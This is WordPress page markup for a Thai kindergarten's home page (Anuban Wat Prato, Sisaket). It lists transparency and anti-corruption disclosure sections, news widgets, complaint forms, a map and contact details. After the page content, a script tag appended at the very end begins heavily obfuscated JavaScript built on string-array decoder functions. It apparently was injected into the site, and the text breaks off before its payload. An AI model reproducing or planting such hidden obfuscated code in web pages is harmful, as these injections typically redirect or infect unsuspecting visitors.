data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code>Q&amp;A</code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 